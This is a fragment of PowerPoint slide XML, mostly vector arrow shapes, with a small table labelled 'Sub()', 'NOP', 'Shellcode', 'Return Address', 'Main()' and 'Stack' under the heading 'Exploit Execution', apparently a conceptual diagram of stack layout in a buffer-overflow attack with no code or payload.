                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145923" y="778255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110998" y="859027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80899" y="941197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55625" y="1024381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35178" y="1108583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19303" y="1193673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8254" y="1279271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1904" y="1365503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1451990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2921" y="1538604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10287" y="1625218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22225" y="1711833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38608" y="1797939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59436" y="1883664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84709" y="1968753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114426" y="2053082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148462" y="2136394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186689" y="2218690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229362" y="2299716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="276225" y="2379345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="327278" y="2457323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382524" y="2533523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="441833" y="2607945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="505333" y="2680208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="572897" y="2750312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="644398" y="2818003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719963" y="2883154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="799464" y="2945638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="882268" y="3004947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="898905" y="2981706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="816101" y="2922397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="737615" y="2860675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="663066" y="2796413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="592454" y="2729611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="525906" y="2660396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="463296" y="2589022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404875" y="2515616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="350392" y="2440559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300100" y="2363724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254000" y="2285238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212089" y="2205355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174371" y="2124456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140842" y="2042414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111760" y="1959228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86867" y="1875536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66421" y="1791208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50291" y="1706499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38608" y="1621409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31368" y="1536191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="1450975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30352" y="1366012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36702" y="1281429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47625" y="1197228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63246" y="1113916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83312" y="1031239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108330" y="949451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137794" y="868934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="172085" y="789559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211327" y="711708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="255269" y="635380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304038" y="560831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357759" y="488188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="387350" y="451485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418211" y="415543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450088" y="380491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483108" y="346328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="517271" y="313054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552323" y="280797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="588390" y="249427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="625475" y="219201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="663575" y="189611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="702563" y="161416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="742441" y="133985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="783336" y="107568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825118" y="82296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="867663" y="58038"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="895914" y="42946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="898017" y="25653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="883333" y="17311"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="949325" h="3005454">
                <a:moveTo>
                  <a:pt x="939319" y="13080"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="891286" y="13080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="904748" y="38226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="895914" y="42946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="891793" y="76835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="939319" y="13080"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="949325" h="3005454">
                <a:moveTo>
                  <a:pt x="898017" y="25653"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="895914" y="42946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="904748" y="38226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="898017" y="25653"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="949325" h="3005454">
                <a:moveTo>
                  <a:pt x="891286" y="13080"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="883333" y="17311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="898017" y="25653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="891286" y="13080"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="949325" h="3005454">
                <a:moveTo>
                  <a:pt x="949071" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="853313" y="253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="883333" y="17311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="891286" y="13080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="939319" y="13080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="949071" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="5496D2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0326878" y="3953509"/>
          <a:ext cx="2301240" cy="47224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7155"/>
                <a:gridCol w="895984"/>
              </a:tblGrid>
              <a:tr h="656081">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" marR="53340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dirty="0" sz="1600" spc="-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Sub()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178435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4668D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09778"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dirty="0" sz="1600" spc="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NOP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149860">
                    <a:lnR w="285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EE6360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4668D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="481583"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dirty="0" sz="1600" spc="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NOP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121285"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EE6360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4668D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="482346">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="679450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dirty="0" sz="16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Shellcode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180340"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EE636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92251"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dirty="0" sz="1600" spc="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NOP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111760"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EE63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4668D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="519684">
                <a:tc gridSpan="2"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dirty="0" sz="1600" spc="5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Return</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1600" spc="-4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Address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171450">
                    <a:lnR w="28575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E636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97407">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" marR="90170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dirty="0" sz="1600" spc="6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Main()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15748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75C4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95783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471170">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr dirty="0" sz="1600" spc="6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Main()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1600" spc="-7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Stack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635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75C4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10360914" y="3504057"/>
            <a:ext cx="221869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30" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-120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000" spc="30" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Execution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633077" y="4366514"/>
            <a:ext cx="725170" cy="3141345"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="725170" h="3141345">
                <a:moveTo>
                  <a:pt x="649822" y="43226"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="603630" y="104394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="561467" y="163449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520573" y="224155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="480822" y="286258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="442468" y="349885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405383" y="414782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="369570" y="480949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335152" y="548132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302259" y="616585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270637" y="686053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240665" y="756412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212344" y="827659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185420" y="899668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160147" y="972312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136651" y="1045718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108457" y="1142364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83566" y="1238377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61975" y="1333500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43688" y="1427480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="1520571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16764" y="1612392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8000" y="1702816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2413" y="1791843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1879219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="380" y="1964817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3937" y="2048510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10541" y="2130298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20066" y="2209800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32384" y="2287143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47751" y="2362200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66040" y="2434590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86995" y="2504313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110617" y="2571369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137287" y="2635504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166497" y="2696464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="198500" y="2754376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233172" y="2808859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270509" y="2860040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="310388" y="2907538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352932" y="2951353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398018" y="2991231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="445643" y="3027172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="495680" y="3058795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548131" y="3086100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602996" y="3109214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="660146" y="3127502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718312" y="3140837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="724789" y="3113024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="666496" y="3099689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611758" y="3081909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="559180" y="3059811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508889" y="3033522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="460882" y="3003042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415290" y="2968498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371982" y="2930017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330834" y="2887726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292353" y="2841625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="256286" y="2792095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222630" y="2739136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191516" y="2682748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163068" y="2623185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137032" y="2560447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113919" y="2494788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93345" y="2426335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75565" y="2355215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60451" y="2281428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48259" y="2205228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38862" y="2126869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32512" y="2046224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28955" y="1963547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="1879092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30988" y="1792605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36575" y="1704721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45212" y="1615186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57023" y="1524253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72008" y="1432178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90043" y="1338961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111378" y="1244727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136017" y="1149603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164083" y="1053846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187325" y="981075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212471" y="909065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239014" y="837564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267207" y="766952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="296925" y="697230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328168" y="628396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360806" y="560577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394970" y="493902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430402" y="428244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467232" y="363982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="505332" y="301116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="544576" y="239522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585216" y="179450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="626872" y="120903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="669671" y="64008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="672106" y="60982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="666876" y="44703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649822" y="43226"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="725170" h="3141345">
                <a:moveTo>
                  <a:pt x="694945" y="35813"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="655701" y="35813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678052" y="53594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="672106" y="60982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="682625" y="93725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="694945" y="35813"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="725170" h="3141345">
                <a:moveTo>
                  <a:pt x="666876" y="44703"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="672106" y="60982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678052" y="53594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="666876" y="44703"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="725170" h="3141345">
                <a:moveTo>
                  <a:pt x="655701" y="35813"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="649822" y="43226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="666876" y="44703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="655701" y="35813"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="725170" h="3141345">
                <a:moveTo>
                  <a:pt x="702564" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="615569" y="40259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649822" y="43226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="655701" y="35813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="694945" y="35813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="702564" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="5496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2568555" y="4877180"/>
            <a:ext cx="748030" cy="2112645"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="748030" h="2112645">
                <a:moveTo>
                  <a:pt x="84795" y="19503"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="70916" y="28921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74382" y="46189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90297" y="53467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115443" y="65532"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164465" y="91440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211963" y="119634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="257937" y="150114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302133" y="182626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344550" y="217170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384937" y="253619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423545" y="292100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="459993" y="332486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494537" y="374523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="526923" y="418465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556895" y="463804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584708" y="510794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="610108" y="559308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="632968" y="609219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="654177" y="662432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="672210" y="716026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687451" y="770128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="699516" y="824357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="708787" y="878840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715137" y="933577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718693" y="988187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719454" y="1015492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719440" y="1043305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="717423" y="1097026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="712724" y="1151128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="705358" y="1204976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="695325" y="1258189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="682625" y="1310894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="667385" y="1362964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649604" y="1414526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="629412" y="1464945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="606679" y="1514602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581533" y="1563370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554227" y="1610868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524383" y="1657096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492506" y="1702054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="458216" y="1745742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="421640" y="1787906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="383031" y="1828546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342265" y="1867408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299339" y="1904746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254508" y="1940052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207518" y="1973453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158623" y="2004949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107696" y="2034159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54991" y="2061210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2086102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11556" y="2112264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67055" y="2087118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121030" y="2059432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="172974" y="2029714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223012" y="1997456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="271018" y="1963293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="316992" y="1927225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361061" y="1888998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402717" y="1849247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="442341" y="1807591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479806" y="1764411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514985" y="1719707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547877" y="1673352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="578485" y="1625981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="606552" y="1577213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="632206" y="1527429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="655447" y="1476502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="676275" y="1424686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="694435" y="1371981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="710056" y="1318641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="723137" y="1264412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="733425" y="1209929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="741045" y="1154684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="745871" y="1099185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="748029" y="1043305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="748029" y="1015492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="745871" y="959358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740791" y="903351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="732789" y="847217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721868" y="791337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707898" y="735711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690752" y="680339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670687" y="625475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647954" y="572516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="623189" y="521970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="595883" y="472948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="566293" y="425450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="517525" y="357632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="482091" y="314325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="444754" y="272923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405129" y="233426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363727" y="195961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="320167" y="160528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274827" y="127127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227838" y="95885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179070" y="66929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128524" y="40132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102743" y="27686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84795" y="19503"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="748030" h="2112645">
                <a:moveTo>
                  <a:pt x="113538" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17906" y="7366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81152" y="79375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74382" y="46189"/>
                </a:lnTo>
